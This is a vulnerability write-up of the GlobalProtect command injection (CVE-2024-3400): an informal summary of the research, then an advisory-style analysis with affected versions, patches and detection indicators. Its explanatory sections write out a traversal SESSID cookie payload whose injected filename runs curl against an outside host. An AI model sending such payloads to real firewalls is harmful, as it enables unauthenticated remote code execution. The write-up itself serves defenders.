Full Report
While fuzzing the Global Protect firewall, they noticed some interesting behavior in the logs. If they attached a semicolon to the SESSID parameter, some strange logs showed up - failed to unmarshal session(peekaboo) map, EOF. The EOF stands for end of file, which is super interesting. This is where the bug begins! The EOF indicates that it's reading a file. Since we added the semicolon, there's no file with that inside of it. Adding in a slash for a directory gives us the nicer error failed to load file. Sick! It's reading a file and we're able to control this. What about directory traversal? If it cannot find the directory, then it will attempt to create it. If the file doesn't exist, then it simply creates a zero byte file with the filename intact. By itself, this doesn't seem to have much of an impact. However, weird primitives lead to the breaking of security assumptions that may no longer be true. So, all we have to do is find some rule that we can violate. Within the telemetry code, it is injesting log files. When doing this, it creates a curl command with shell capabilities to transfer the file. Now, there is an arbitrary file name in a bash command. That previous primitive seems super nice now! While playing around with this, they noticed that spaces weren't allowed within the cookie values. So, we have to get creative! {IFS} can be used for a space within bash. So, if we create a filename with bash metacharacters, like semicolons or backticks, we can inject arbitrary commands! For instance, creating a file in the logs directory via traversal with `curl${IFS}x1.outboundhost.com` in the name will create an outbound curl request. Neat! Although not mentioned in the original post, the vulnerability appears to be within an underlying library called Gorilla sessions. So, this primitive of writing arbitrary files likely affects A LOT more things than just this application. Overall, an awesome post on a bizarre command injection. This took a weird arbitrary file write to trigger, but was interesting. To me, a takeaway is that fuzzing is useful but it's not a launch and let go. Instead, reading the error messages, responses and all other available information to look for weird behavior is worth while.
Analysis Summary
# Vulnerability: Unauthenticated Remote Code Execution in Palo Alto Networks GlobalProtect
## CVE Details
- **CVE ID:** CVE-2024-3400
- **CVSS Score:** 10.0 (Critical)
- **CWE:** CWE-77 (Improper Neutralization of Special Elements used in a Command) / CWE-22 (Path Traversal)
## Affected Systems
- **Products:** Palo Alto Networks PAN-OS software.
- **Versions:**
- PAN-OS 10.2 (below 10.2.9-h1)
- PAN-OS 11.0 (below 11.0.4-h1)
- PAN-OS 11.1 (below 11.1.2-h3)
- **Configurations:** Firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both).
- *Note:* While initially believed to require "Device Telemetry" to be enabled, subsequent updates confirmed the vulnerability is exploitable even if telemetry is disabled.
## Vulnerability Description
The vulnerability is a two-stage flaw involving arbitrary file creation and command injection.
1. **Directory Traversal/File Creation:** The GlobalProtect service (`gpsvc`) fails to properly validate the `SESSID` cookie. By using dot-dot-slash (`../`) sequences, an attacker can traverse directories. If the specified file does not exist, the system creates a zero-byte file.
2. **Command Injection:** A background telemetry process (underlying the Panorama/telemetry features) periodically executes a shell command to transfer logs via `curl`. This process incorporates the filenames from the `/opt/panlogs/tmp/device_telemetry/minute/` directory into a command string. Because an attacker can control the filename via the first primitive, they can inject shell metacharacters (e.g., backticks or semicolons) into the filename to achieve execution.
## Exploitation
- **Status:** Exploited in the wild (Zero-day activity observed). PoC is publicly available.
- **Complexity:** Low
- **Attack Vector:** Network (Unauthenticated)
## Impact
- **Confidentiality:** Total (Root access to the firewall)
- **Integrity:** Total
- **Availability:** Total
## Remediation
### Patches
Palo Alto Networks has released updates to address this flaw. Users should upgrade to:
- PAN-OS 10.2.9-h1 or later
- PAN-OS 11.0.4-h1 or later
- PAN-OS 11.1.2-h3 or later
### Workarounds
- **Threat Prevention Subscription:** Customers with an active subscription can block attacks by enabling **Threat ID 95187** (and ensuring vulnerability protection is applied to the GlobalProtect interface).
- **Disable Telemetry:** (Legacy advice, now superseded by patching as it was found that disabling telemetry does not fully mitigate the risk).
## Detection
- **Indicators of Compromise (IoC):**
- Look for unexpected zero-byte files in `/opt/panlogs/tmp/device_telemetry/minute/`.
- Monitor for shell metacharacters (e.g., `` ` ``, `${IFS}`, `;`) within `SESSID` cookie values in web server logs.
- **Detection Method:** A sample PoC request utilizes a crafted POST request to `/ssl-vpn/hipreport.esp` with a traversal payload in the `SESSID` cookie:
- `Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/exploit`curl${IFS}oob-check.com`;`
## References
- **Vendor Advisory:** hxxps://advisories[.]paloaltonetworks[.]com/advisory/cve-2024-3400/
- **Original Analysis:** hxxps://labs[.]watchtowr[.]com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
- **Volexity Incident Report:** hxxps://www[.]volexity[.]com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/